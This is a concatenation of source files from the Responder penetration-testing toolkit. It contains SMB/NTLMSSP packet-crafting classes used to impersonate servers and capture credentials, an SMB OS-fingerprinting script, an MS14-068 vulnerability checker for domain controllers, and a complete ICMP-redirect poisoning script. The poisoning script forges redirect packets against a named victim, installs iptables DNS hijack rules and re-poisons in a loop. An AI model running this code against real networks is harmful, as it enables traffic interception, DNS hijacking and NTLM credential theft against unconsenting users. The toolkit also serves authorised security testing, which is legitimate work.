AsnLen = str(self.fields["ChoiceTagASNId"])+str(self.fields["ChoiceTagASNLenOfLen"])+str(self.fields["ChoiceTagASNIdLen"])+str(self.fields["NegTokenTagASNId"])+str(self.fields["NegTokenTagASNLenOfLen"])+str(self.fields["NegTokenTagASNIdLen"])+str(self.fields["Tag0ASNId"])+str(self.fields["Tag0ASNIdLen"])+str(self.fields["NegoStateASNId"])+str(self.fields["NegoStateASNLen"])+str(self.fields["NegoStateASNValue"])+str(self.fields["Tag1ASNId"])+str(self.fields["Tag1ASNIdLen"])+str(self.fields["Tag1ASNId2"])+str(self.fields["Tag1ASNId2Len"])+str(self.fields["Tag1ASNId2Str"])+str(self.fields["Tag2ASNId"])+str(self.fields["Tag2ASNIdLenOfLen"])+str(self.fields["Tag2ASNIdLen"])+str(self.fields["Tag3ASNId"])+str(self.fields["Tag3ASNIdLenOfLen"])+str(self.fields["Tag3ASNIdLen"])
CalculateSecBlob = str(self.fields["NTLMSSPSignature"])+str(self.fields["NTLMSSPSignatureNull"])+str(self.fields["NTLMSSPMessageType"])+str(self.fields["NTLMSSPNtWorkstationLen"])+str(self.fields["NTLMSSPNtWorkstationMaxLen"])+str(self.fields["NTLMSSPNtWorkstationBuffOffset"])+str(self.fields["NTLMSSPNtNegotiateFlags"])+str(self.fields["NTLMSSPNtServerChallenge"])+str(self.fields["NTLMSSPNtReserved"])+str(self.fields["NTLMSSPNtTargetInfoLen"])+str(self.fields["NTLMSSPNtTargetInfoMaxLen"])+str(self.fields["NTLMSSPNtTargetInfoBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])+str(self.fields["NTLMSSPNtWorkstationName"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsId"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsLen"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs2Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs2Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs3Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs3Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs5Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs5Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs6Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs6Len"])
###### Bcc len
BccLen = AsnLen+CalculateSecBlob+str(self.fields["NTLMSSPNTLMPadding"])+str(self.fields["NativeOs"])+str(self.fields["NativeOsTerminator"])+str(self.fields["NativeLAN"])+str(self.fields["NativeLANTerminator"])
###### SecBlobLen
self.fields["SecBlobLen"] = struct.pack("<h", len(AsnLen+CalculateSecBlob))
self.fields["Bcc"] = struct.pack("<h", len(BccLen))
self.fields["ChoiceTagASNIdLen"] = struct.pack(">B", len(AsnLen+CalculateSecBlob)-3)
self.fields["NegTokenTagASNIdLen"] = struct.pack(">B", len(AsnLen+CalculateSecBlob)-6)
self.fields["Tag1ASNIdLen"] = struct.pack(">B", len(str(self.fields["Tag1ASNId2"])+str(self.fields["Tag1ASNId2Len"])+str(self.fields["Tag1ASNId2Str"])))
self.fields["Tag1ASNId2Len"] = struct.pack(">B", len(str(self.fields["Tag1ASNId2Str"])))
self.fields["Tag2ASNIdLen"] = struct.pack(">B", len(CalculateSecBlob+str(self.fields["Tag3ASNId"])+str(self.fields["Tag3ASNIdLenOfLen"])+str(self.fields["Tag3ASNIdLen"])))
self.fields["Tag3ASNIdLen"] = struct.pack(">B", len(CalculateSecBlob))
###### Andxoffset calculation.
CalculateCompletePacket = str(self.fields["Wordcount"])+str(self.fields["AndXCommand"])+str(self.fields["Reserved"])+str(self.fields["Andxoffset"])+str(self.fields["Action"])+str(self.fields["SecBlobLen"])+str(self.fields["Bcc"])+BccLen
self.fields["Andxoffset"] = struct.pack("<h", len(CalculateCompletePacket)+32)
###### Workstation Offset
CalculateOffsetWorkstation = str(self.fields["NTLMSSPSignature"])+str(self.fields["NTLMSSPSignatureNull"])+str(self.fields["NTLMSSPMessageType"])+str(self.fields["NTLMSSPNtWorkstationLen"])+str(self.fields["NTLMSSPNtWorkstationMaxLen"])+str(self.fields["NTLMSSPNtWorkstationBuffOffset"])+str(self.fields["NTLMSSPNtNegotiateFlags"])+str(self.fields["NTLMSSPNtServerChallenge"])+str(self.fields["NTLMSSPNtReserved"])+str(self.fields["NTLMSSPNtTargetInfoLen"])+str(self.fields["NTLMSSPNtTargetInfoMaxLen"])+str(self.fields["NTLMSSPNtTargetInfoBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])
###### AvPairs Offset
CalculateLenAvpairs = str(self.fields["NTLMSSPNTLMChallengeAVPairsId"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsLen"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs2Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs2Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs3Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs3Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs5Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs5Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs6Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs6Len"])
##### Workstation Offset Calculation:
self.fields["NTLMSSPNtWorkstationBuffOffset"] = struct.pack("<i", len(CalculateOffsetWorkstation))
self.fields["NTLMSSPNtWorkstationLen"] = struct.pack("<h", len(str(self.fields["NTLMSSPNtWorkstationName"])))
self.fields["NTLMSSPNtWorkstationMaxLen"] = struct.pack("<h", len(str(self.fields["NTLMSSPNtWorkstationName"])))
##### IvPairs Offset Calculation:
self.fields["NTLMSSPNtTargetInfoBuffOffset"] = struct.pack("<i", len(CalculateOffsetWorkstation+str(self.fields["NTLMSSPNtWorkstationName"])))
self.fields["NTLMSSPNtTargetInfoLen"] = struct.pack("<h", len(CalculateLenAvpairs))
self.fields["NTLMSSPNtTargetInfoMaxLen"] = struct.pack("<h", len(CalculateLenAvpairs))
##### IvPair Calculation:
self.fields["NTLMSSPNTLMChallengeAVPairs5Len"] = struct.pack("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"])))
self.fields["NTLMSSPNTLMChallengeAVPairs3Len"] = struct.pack("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"])))
self.fields["NTLMSSPNTLMChallengeAVPairs2Len"] = struct.pack("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"])))
self.fields["NTLMSSPNTLMChallengeAVPairs1Len"] = struct.pack("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"])))
self.fields["NTLMSSPNTLMChallengeAVPairsLen"] = struct.pack("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"])))
class SMBSession2Accept(Packet):
fields = OrderedDict([
("Wordcount", "\x04"),
("AndXCommand", "\xff"),
("Reserved", "\x00"),
("Andxoffset", "\xb4\x00"),
("Action", "\x00\x00"),
("SecBlobLen", "\x09\x00"),
("Bcc", "\x89\x01"),
("SSPIAccept","\xa1\x07\x30\x05\xa0\x03\x0a\x01\x00"),
("NativeOs","Windows Server 2003 3790 Service Pack 2"),
("NativeOsTerminator","\x00\x00"),
("NativeLAN", "Windows Server 2003 5.2"),
("NativeLANTerminator","\x00\x00"),
])
def calculate(self):
self.fields["NativeOs"] = self.fields["NativeOs"].encode('utf-16le')
self.fields["NativeLAN"] = self.fields["NativeLAN"].encode('utf-16le')
BccLen = str(self.fields["SSPIAccept"])+str(self.fields["NativeOs"])+str(self.fields["NativeOsTerminator"])+str(self.fields["NativeLAN"])+str(self.fields["NativeLANTerminator"])
self.fields["Bcc"] = struct.pack("<h", len(BccLen))
class SMBSessEmpty(Packet):
fields = OrderedDict([
("Empty", "\x00\x00\x00"),
])
class SMBTreeData(Packet):
fields = OrderedDict([
("Wordcount", "\x07"),
("AndXCommand", "\xff"),
("Reserved","\x00" ),
("Andxoffset", "\xbd\x00"),
("OptionalSupport","\x00\x00"),
("MaxShareAccessRight","\x00\x00\x00\x00"),
("GuestShareAccessRight","\x00\x00\x00\x00"),
("Bcc", "\x94\x00"),
("Service", "IPC"),
("ServiceTerminator","\x00\x00\x00\x00"),
])
def calculate(self):
## Complete Packet Len
CompletePacket= str(self.fields["Wordcount"])+str(self.fields["AndXCommand"])+str(self.fields["Reserved"])+str(self.fields["Andxoffset"])+str(self.fields["OptionalSupport"])+str(self.fields["MaxShareAccessRight"])+str(self.fields["GuestShareAccessRight"])+str(self.fields["Bcc"])+str(self.fields["Service"])+str(self.fields["ServiceTerminator"])
## AndXOffset
self.fields["Andxoffset"] = struct.pack("<H", len(CompletePacket)+32)
## BCC Len Calc
BccLen= str(self.fields["Service"])+str(self.fields["ServiceTerminator"])
self.fields["Bcc"] = struct.pack("<H", len(BccLen))
class SMBSessTreeAns(Packet):
fields = OrderedDict([
("Wordcount", "\x03"),
("Command", "\x75"),
("Reserved", "\x00"),
("AndXoffset", "\x4e\x00"),
("Action", "\x01\x00"),
("Bcc", "\x25\x00"),
("NativeOs", "Windows 5.1"),
("NativeOsNull", "\x00"),
("NativeLan", "Windows 2000 LAN Manager"),
("NativeLanNull", "\x00"),
("WordcountTree", "\x03"),
("AndXCommand", "\xff"),
("Reserved1", "\x00"),
("AndxOffset", "\x00\x00"),
("OptionalSupport", "\x01\x00"),
("Bcc2", "\x08\x00"),
("Service", "A:"),
("ServiceNull", "\x00"),
("FileSystem", "NTFS"),
("FileSystemNull", "\x00"),
])
def calculate(self):
## AndxOffset
CalculateCompletePacket = str(self.fields["Wordcount"])+str(self.fields["Command"])+str(self.fields["Reserved"])+str(self.fields["AndXoffset"])+str(self.fields["Action"])+str(self.fields["Bcc"])+str(self.fields["NativeOs"])+str(self.fields["NativeOsNull"])+str(self.fields["NativeLan"])+str(self.fields["NativeLanNull"])
self.fields["AndXoffset"] = struct.pack("<i", len(CalculateCompletePacket)+32)[:2]
## BCC 1 and 2
CompleteBCCLen = str(self.fields["NativeOs"])+str(self.fields["NativeOsNull"])+str(self.fields["NativeLan"])+str(self.fields["NativeLanNull"])
self.fields["Bcc"] = struct.pack("<h",len(CompleteBCCLen))
CompleteBCC2Len = str(self.fields["Service"])+str(self.fields["ServiceNull"])+str(self.fields["FileSystem"])+str(self.fields["FileSystemNull"])
self.fields["Bcc2"] = struct.pack("<h",len(CompleteBCC2Len))
### SMB2 Packets
class SMB2Header(Packet):
fields = OrderedDict([
("Proto", "\xff\x53\x4d\x42"),
("Cmd", "\x72"),
("Error-Code", "\x00\x00\x00\x00" ),
("Flag1", "\x10"),
("Flag2", "\x00\x00"),
("Pidhigh", "\x00\x00"),
("Signature", "\x00\x00\x00\x00\x00\x00\x00\x00"),
("Reserved", "\x00\x00"),
("TID", "\x00\x00"),
("PID", "\xff\xfe"),
("UID", "\x00\x00"),
("MID", "\x00\x00"),
])
class SMB2Nego(Packet):
fields = OrderedDict([
("Wordcount", "\x00"),
("Bcc", "\x62\x00"),
("Data", "")
])
def calculate(self):
self.fields["Bcc"] = struct.pack("<H",len(str(self.fields["Data"])))
class SMB2NegoData(Packet):
fields = OrderedDict([
("StrType","\x02" ),
("dialect", "NT LM 0.12\x00"),
("StrType1","\x02"),
("dialect1", "SMB 2.002\x00"),
("StrType2","\x02"),
("dialect2", "SMB 2.???\x00"),
])
| 75,480 | Python | .py | 1,222 | 58.794599 | 1,786 | 0.657777 | SpiderLabs/Responder | 4,450 | 1,663 | 44 | GPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,390 | fingerprint.py | SpiderLabs_Responder/fingerprint.py | #!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import socket
import struct
from utils import color
from packets import SMBHeader, SMBNego, SMBNegoFingerData, SMBSessionFingerData
def OsNameClientVersion(data):
try:
length = struct.unpack('<H',data[43:45])[0]
pack = tuple(data[47+length:].split('\x00\x00\x00'))[:2]
OsVersion, ClientVersion = tuple([e.replace('\x00','') for e in data[47+length:].split('\x00\x00\x00')[:2]])
return OsVersion, ClientVersion
except:
return "Could not fingerprint Os version.", "Could not fingerprint LanManager Client version"
def RunSmbFinger(host):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(host)
s.settimeout(0.7)
h = SMBHeader(cmd="\x72",flag1="\x18",flag2="\x53\xc8")
n = SMBNego(data = SMBNegoFingerData())
n.calculate()
Packet = str(h)+str(n)
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
s.send(Buffer)
data = s.recv(2048)
if data[8:10] == "\x72\x00":
Header = SMBHeader(cmd="\x73",flag1="\x18",flag2="\x17\xc8",uid="\x00\x00")
Body = SMBSessionFingerData()
Body.calculate()
Packet = str(Header)+str(Body)
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
s.send(Buffer)
data = s.recv(2048)
if data[8:10] == "\x73\x16":
return OsNameClientVersion(data)
except:
print color("[!] ", 1, 1) +" Fingerprint failed"
return None
| 2,088 | Python | .py | 53 | 36.811321 | 110 | 0.725383 | SpiderLabs/Responder | 4,450 | 1,663 | 44 | GPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,391 | Icmp-Redirect.py | SpiderLabs_Responder/tools/Icmp-Redirect.py | #! /usr/bin/env python
# NBT-NS/LLMNR Responder
# Created by Laurent Gaffie
# Copyright (C) 2014 Trustwave Holdings, Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import socket
import struct
import optparse
import pipes
import sys
from socket import *
sys.path.append('../')
from odict import OrderedDict
from random import randrange
from time import sleep
from subprocess import call
from packets import Packet
parser = optparse.OptionParser(usage='python %prog -I eth0 -i 10.20.30.40 -g 10.20.30.254 -t 10.20.30.48 -r 10.20.40.1',
prog=sys.argv[0],
)
parser.add_option('-i','--ip', action="store", help="The ip address to redirect the traffic to. (usually yours)", metavar="10.20.30.40",dest="OURIP")
parser.add_option('-g', '--gateway',action="store", help="The ip address of the original gateway (issue the command 'route -n' to know where is the gateway", metavar="10.20.30.254",dest="OriginalGwAddr")
parser.add_option('-t', '--target',action="store", help="The ip address of the target", metavar="10.20.30.48",dest="VictimIP")
parser.add_option('-r', '--route',action="store", help="The ip address of the destination target, example: DNS server. Must be on another subnet.", metavar="10.20.40.1",dest="ToThisHost")
parser.add_option('-s', '--secondaryroute',action="store", help="The ip address of the destination target, example: Secondary DNS server. Must be on another subnet.", metavar="10.20.40.1",dest="ToThisHost2")
parser.add_option('-I', '--interface',action="store", help="Interface name to use, example: eth0", metavar="eth0",dest="Interface")
parser.add_option('-a', '--alternate',action="store", help="The alternate gateway, set this option if you wish to redirect the victim traffic to another host than yours", metavar="10.20.30.40",dest="AlternateGwAddr")
options, args = parser.parse_args()
if options.OURIP is None:
print "-i mandatory option is missing.\n"
parser.print_help()
exit(-1)
elif options.OriginalGwAddr is None:
print "-g mandatory option is missing, please provide the original gateway address.\n"
parser.print_help()
exit(-1)
elif options.VictimIP is None:
print "-t mandatory option is missing, please provide a target.\n"
parser.print_help()
exit(-1)
elif options.Interface is None:
print "-I mandatory option is missing, please provide your network interface.\n"
parser.print_help()
exit(-1)
elif options.ToThisHost is None:
print "-r mandatory option is missing, please provide a destination target.\n"
parser.print_help()
exit(-1)
if options.AlternateGwAddr is None:
AlternateGwAddr = options.OURIP
#Setting some vars.
OURIP = options.OURIP
OriginalGwAddr = options.OriginalGwAddr
AlternateGwAddr = options.AlternateGwAddr
VictimIP = options.VictimIP
ToThisHost = options.ToThisHost
ToThisHost2 = options.ToThisHost2
Interface = options.Interface
def Show_Help(ExtraHelpData):
print("\nICMP Redirect Utility 0.1.\nCreated by Laurent Gaffie, please send bugs/comments to laurent.gaffie@gmail.com\n\nThis utility combined with Responder is useful when you're sitting on a Windows based network.\nMost Linux distributions discard by default ICMP Redirects.\n")
print(ExtraHelpData)
MoreHelp = "Note that if the target is Windows, the poisoning will only last for 10mn, you can re-poison the target by launching this utility again\nIf you wish to respond to the traffic, for example DNS queries your target issues, launch this command as root:\n\niptables -A OUTPUT -p ICMP -j DROP && iptables -t nat -A PREROUTING -p udp --dst %s --dport 53 -j DNAT --to-destination %s:53\n\n"%(ToThisHost,OURIP)
def GenCheckSum(data):
s = 0
for i in range(0, len(data), 2):
q = ord(data[i]) + (ord(data[i+1]) << 8)
f = s + q
s = (f & 0xffff) + (f >> 16)
return struct.pack("<H",~s & 0xffff)
#####################################################################
#ARP Packets
#####################################################################
class EthARP(Packet):
fields = OrderedDict([
("DstMac", "\xff\xff\xff\xff\xff\xff"),
("SrcMac", ""),
("Type", "\x08\x06" ), #ARP
])
class ARPWhoHas(Packet):
fields = OrderedDict([
("HwType", "\x00\x01"),
("ProtoType", "\x08\x00" ), #IP
("MacLen", "\x06"),
("IPLen", "\x04"),
("OpCode", "\x00\x01"),
("SenderMac", ""),
("SenderIP", "\x00\xff\x53\x4d"),
("DstMac", "\x00\x00\x00\x00\x00\x00"),
("DstIP", "\x00\x00\x00\x00"),
])
def calculate(self):
self.fields["DstIP"] = inet_aton(self.fields["DstIP"])
self.fields["SenderIP"] = inet_aton(OURIP)
#####################################################################
#ICMP Redirect Packets
#####################################################################
class Eth2(Packet):
fields = OrderedDict([
("DstMac", ""),
("SrcMac", ""),
("Type", "\x08\x00" ), #IP
])
class IPPacket(Packet):
fields = OrderedDict([
("VLen", "\x45"),
("DifField", "\x00"),
("Len", "\x00\x38"),
("TID", "\x25\x25"),
("Flag", "\x00"),
("FragOffset", "\x00"),
("TTL", "\x1d"),
("Cmd", "\x01"), #ICMP
("CheckSum", "\x00\x00"),
("SrcIP", ""),
("DestIP", ""),
("Data", ""),
])
def calculate(self):
self.fields["TID"] = chr(randrange(256))+chr(randrange(256))
self.fields["SrcIP"] = inet_aton(str(self.fields["SrcIP"]))
self.fields["DestIP"] = inet_aton(str(self.fields["DestIP"]))
# Calc Len First
CalculateLen = str(self.fields["VLen"])+str(self.fields["DifField"])+str(self.fields["Len"])+str(self.fields["TID"])+str(self.fields["Flag"])+str(self.fields["FragOffset"])+str(self.fields["TTL"])+str(self.fields["Cmd"])+str(self.fields["CheckSum"])+str(self.fields["SrcIP"])+str(self.fields["DestIP"])+str(self.fields["Data"])
self.fields["Len"] = struct.pack(">H", len(CalculateLen))
# Then CheckSum this packet
CheckSumCalc =str(self.fields["VLen"])+str(self.fields["DifField"])+str(self.fields["Len"])+str(self.fields["TID"])+str(self.fields["Flag"])+str(self.fields["FragOffset"])+str(self.fields["TTL"])+str(self.fields["Cmd"])+str(self.fields["CheckSum"])+str(self.fields["SrcIP"])+str(self.fields["DestIP"])
self.fields["CheckSum"] = GenCheckSum(CheckSumCalc)
class ICMPRedir(Packet):
fields = OrderedDict([
("Type", "\x05"),
("OpCode", "\x01"),
("CheckSum", "\x00\x00"),
("GwAddr", ""),
("Data", ""),
])
def calculate(self):
self.fields["GwAddr"] = inet_aton(OURIP)
CheckSumCalc =str(self.fields["Type"])+str(self.fields["OpCode"])+str(self.fields["CheckSum"])+str(self.fields["GwAddr"])+str(self.fields["Data"])
self.fields["CheckSum"] = GenCheckSum(CheckSumCalc)
class DummyUDP(Packet):
fields = OrderedDict([
("SrcPort", "\x00\x35"), #port 53
("DstPort", "\x00\x35"),
("Len", "\x00\x08"), #Always 8 in this case.
("CheckSum", "\x00\x00"), #CheckSum disabled.
])
def ReceiveArpFrame(DstAddr):
s = socket(AF_PACKET, SOCK_RAW)
s.settimeout(5)
Protocol = 0x0806
s.bind((Interface, Protocol))
OurMac = s.getsockname()[4]
Eth = EthARP(SrcMac=OurMac)
Arp = ARPWhoHas(DstIP=DstAddr,SenderMac=OurMac)
Arp.calculate()
final = str(Eth)+str(Arp)
try:
s.send(final)
data = s.recv(1024)
DstMac = data[22:28]
DestMac = DstMac.encode('hex')
PrintMac = ":".join([DestMac[x:x+2] for x in xrange(0, len(DestMac), 2)])
return PrintMac,DstMac
except:
print "[ARP]%s took too long to Respond. Please provide a valid host.\n"%(DstAddr)
exit(1)
def IcmpRedirectSock(DestinationIP):
PrintMac,DestMac = ReceiveArpFrame(VictimIP)
print '[ARP]Target Mac address is :',PrintMac
PrintMac,RouterMac = ReceiveArpFrame(OriginalGwAddr)
print '[ARP]Router Mac address is :',PrintMac
s = socket(AF_PACKET, SOCK_RAW)
Protocol = 0x0800
s.bind((Interface, Protocol))
Eth = Eth2(DstMac=DestMac,SrcMac=RouterMac)
IPPackUDP = IPPacket(Cmd="\x11",SrcIP=VictimIP,DestIP=DestinationIP,TTL="\x40",Data=str(DummyUDP()))
IPPackUDP.calculate()
ICMPPack = ICMPRedir(GwAddr=AlternateGwAddr,Data=str(IPPackUDP))
ICMPPack.calculate()
IPPack = IPPacket(SrcIP=OriginalGwAddr,DestIP=VictimIP,TTL="\x40",Data=str(ICMPPack))
IPPack.calculate()
final = str(Eth)+str(IPPack)
s.send(final)
print '\n[ICMP]%s should have been poisoned with a new route for target: %s.\n'%(VictimIP,DestinationIP)
def FindWhatToDo(ToThisHost2):
if ToThisHost2 != None:
Show_Help('Hit CRTL-C to kill this script')
RunThisInLoop(ToThisHost, ToThisHost2,OURIP)
if ToThisHost2 == None:
Show_Help(MoreHelp)
IcmpRedirectSock(DestinationIP=ToThisHost)
exit()
def RunThisInLoop(host, host2, ip):
dns1 = pipes.quote(host)
dns2 = pipes.quote(host2)
ouripadd = pipes.quote(ip)
call("iptables -A OUTPUT -p ICMP -j DROP && iptables -t nat -A PREROUTING -p udp --dst "+dns1+" --dport 53 -j DNAT --to-destination "+ouripadd+":53", shell=True)
call("iptables -A OUTPUT -p ICMP -j DROP && iptables -t nat -A PREROUTING -p udp --dst "+dns2+" --dport 53 -j DNAT --to-destination "+ouripadd+":53", shell=True)
print "[+]Automatic mode enabled\nAn iptable rules has been added for both DNS servers."
while True:
IcmpRedirectSock(DestinationIP=dns1)
IcmpRedirectSock(DestinationIP=dns2)
print "[+]Repoisoning the target in 8 minutes..."
sleep(480)
FindWhatToDo(ToThisHost2)
| 10,516 | Python | .py | 217 | 43.152074 | 413 | 0.64244 | SpiderLabs/Responder | 4,450 | 1,663 | 44 | GPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,392 | FindSMB2UPTime.py | SpiderLabs_Responder/tools/FindSMB2UPTime.py | #!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import sys
import os
import datetime
import struct
import socket
sys.path.insert(0, os.path.realpath(os.path.join(os.path.dirname(__file__), '..')))
from packets import SMB2Header, SMB2Nego, SMB2NegoData
def GetBootTime(data):
Filetime = int(struct.unpack('<q',data)[0])
t = divmod(Filetime - 116444736000000000, 10000000)
time = datetime.datetime.fromtimestamp(t[0])
return time, time.strftime('%Y-%m-%d %H:%M:%S')
def IsDCVuln(t):
Date = datetime.datetime(2014, 11, 17, 0, 30)
if t[0] < Date:
print "DC is up since:", t[1]
print "This DC is vulnerable to MS14-068"
print "DC is up since:", t[1]
def run(host):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(host)
s.settimeout(5)
Header = SMB2Header(Cmd="\x72",Flag1="\x18",Flag2="\x53\xc8")
Nego = SMB2Nego(Data = SMB2NegoData())
Nego.calculate()
Packet = str(Header)+str(Nego)
Buffer = struct.pack(">i", len(Packet)) + Packet
s.send(Buffer)
try:
data = s.recv(1024)
if data[4:5] == "\xff":
print "This host doesn't support SMBv2"
if data[4:5] == "\xfe":
IsDCVuln(GetBootTime(data[116:124]))
except Exception:
s.close()
raise
if __name__ == "__main__":
if len(sys.argv)<=1:
sys.exit('Usage: python '+sys.argv[0]+' DC-IP-address')
host = sys.argv[1],445
run(host)
| 2,160 | Python | .py | 58 | 33.103448 | 83 | 0.681166 | SpiderLabs/Responder | 4,450 | 1,663 | 44 | GPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,393 | RelayPackets.py | SpiderLabs_Responder/tools/RelayPackets.py | #!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import struct
import sys
sys.path.append('../')
from odict import OrderedDict
from packets import Packet
class SMBHeader(Packet):
fields = OrderedDict([
("proto", "\xff\x53\x4d\x42"),
("cmd", "\x72"),
("errorcode", "\x00\x00\x00\x00"),
("flag1", "\x00"),
("flag2", "\x00\x00"),
("pidhigh", "\x00\x00"),
("signature", "\x00\x00\x00\x00\x00\x00\x00\x00"),
("reserved", "\x00\x00"),
("tid", "\x00\x00"),
("pid", "\x00\x00"),
("uid", "\x00\x00"),
("mid", "\x00\x00"),
])
class SMBNego(Packet):
fields = OrderedDict([
("Wordcount", "\x00"),
("Bcc", "\x62\x00"),
("Data", "")
])
def calculate(self):
self.fields["Bcc"] = struct.pack("<h",len(str(self.fields["Data"])))
class SMBNegoData(Packet):
fields = OrderedDict([
("Separator1","\x02" ),
("Dialect1", "\x50\x43\x20\x4e\x45\x54\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31\x2e\x30\x00"),
("Separator2","\x02"),
("Dialect2", "\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"),
("Separator3","\x02"),
("Dialect3", "\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61\x00"),
("Separator4","\x02"),
("Dialect4", "\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00"),
("Separator5","\x02"),
("Dialect5", "\x4c\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00"),
("Separator6","\x02"),
("Dialect6", "\x4e\x54\x20\x4c\x4d\x20\x30\x2e\x31\x32\x00"),
])
class SMBSessionTreeData(Packet):
fields = OrderedDict([
("Wordcount", "\x0d"),
("AndXCommand", "\x75"),
("Reserved", "\x00" ),
("Andxoffset", "\x7c\x00"),
("Maxbuff","\x04\x11"),
("Maxmpx", "\x32\x00"),
("Vcnum","\x00\x00"),
("Sessionkey", "\x00\x00\x00\x00"),
("AnsiPassLength","\x18\x00"),
("UnicodePassLength", "\x00\x00"),
("Reserved2","\x00\x00\x00\x00"),
("Capabilities", "\xd4\x00\x00\x00"),
("Bcc","\x3f\x00"),
